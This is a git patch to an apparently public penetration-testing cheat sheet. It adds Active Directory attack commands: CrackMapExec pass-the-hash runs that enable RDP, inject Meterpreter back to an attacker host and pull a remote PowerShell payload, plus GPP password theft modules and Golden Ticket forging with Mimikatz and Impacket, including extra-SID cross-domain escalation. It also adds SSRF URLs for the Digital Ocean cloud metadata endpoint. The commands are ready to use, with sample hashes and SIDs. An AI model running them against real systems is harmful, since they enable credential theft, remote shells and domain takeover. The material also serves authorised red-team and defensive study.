From 93f4bbb19e3a237e90a0006adbe049de7b2dbc70 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 15 Jul 2018 11:06:43 +0200 Subject: [PATCH] AD BloodHound + AD Relationship + SSRF Digital Ocean --- .../Active Directory Attack.md | 48 ++++++++++++++++++- .../Windows - Using credentials.md | 5 ++ SSRF injection/README.md | 6 ++- 3 files changed, 56 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 8adc216..82f6fe7 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -15,6 +15,7 @@ * [Pass-the-Hash](#pass-the-hash) * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) + * [Trust relationship between domains](#trust-relationship-between-domains) * [Privilege Escalation](#privilege-escalation) * [PrivEsc Local Admin - Token Impersonation (RottenPotato)](#privesc-local-admin---token-impersonation-rottenpotato) * [PrivEsc Local Admin - MS16-032](#privesc-local-admin---ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) @@ -28,11 +29,23 @@ * [Mimikatz](https://github.com/gentilkiwi/mimikatz) * [Ranger](https://github.com/funkandwagnalls/ranger) * [BloodHound](https://github.com/BloodHoundAD/BloodHound) +```powershell +apt install bloodhound #kali +neo4j console +Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j +./bloodhound +SharpHound.exe (from resources/Ingestor) +or +Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public +``` * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) ```bash git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec +crackmapexec smb -L +crackmapexec smb -M name_module -o VAR=DATA crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares +crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' @@ -95,6 +108,12 @@ windows/gather/enumshares windows/gather/credentials/gpp ``` +Crackmapexec modules +```powershell +cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin +cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password +``` + List all GPO for a domain ```powershell Get-GPO -domaine DOMAIN.COM -all @@ -202,6 +221,7 @@ lsadump::dcsync /user:krbtgt lsadump::lsa /inject /name:krbtgt Forge a Golden ticket - Mimikatz +kerberos::purge kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt kerberos::tgt ``` @@ -229,6 +249,10 @@ misc::convert ccache ticket.kirbi Alternatively you can use ticketer from Impacket ./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da +ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519 +./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519 + + export KRB5CCNAME=/home/user/ticket.ccache cat $KRB5CCNAME @@ -310,6 +334,18 @@ or ([adsisearcher]"(AdminCount=1)").findall() ``` +### Trust relationship between domains +```powershell +nltest /trusted_domains +``` +or +```powershell +([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() + +SourceName TargetName TrustType TrustDirection +---------- ---------- --------- -------------- +domainA.local domainB.local TreeRoot Bidirectional +``` ## Privilege Escalation @@ -358,7 +394,7 @@ net group "Domain Admins" hacker2 /add /domain ``` -## Thanks to +## Documentation / Thanks to * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html) * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288) @@ -376,4 +412,12 @@ net group "Domain Admins" hacker2 /add /domain * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) * [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) - * [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/) \ No newline at end of file + * [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/) + * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/) + * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/) + * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/) + * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/) + * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) + * [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf) + * [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/) + * [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 37894ff..1b55ebe 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -85,6 +85,11 @@ or with psexec(sysinternals) psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 ``` +or with crackmapexec +```powershell +crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable +``` + For Server 2012 R2, Win8.1+ ``` xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12 diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 0399cf4..07fb99e 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -277,7 +277,8 @@ http://metadata.google.internal/computeMetadata/v1beta1/ ## SSRF URL for Digital Ocean https://developers.digitalocean.com/documentation/metadata/ -``` +```powershell +curl http://169.254.169.254/metadata/v1/id http://169.254.169.254/metadata/v1.json http://169.254.169.254/metadata/v1/ http://169.254.169.254/metadata/v1/id @@ -285,6 +286,9 @@ http://169.254.169.254/metadata/v1/user-data http://169.254.169.254/metadata/v1/hostname http://169.254.169.254/metadata/v1/region http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address + +All in one request: +curl http://169.254.169.254/metadata/v1.json | jq ``` ## SSRF URL for Packetcloud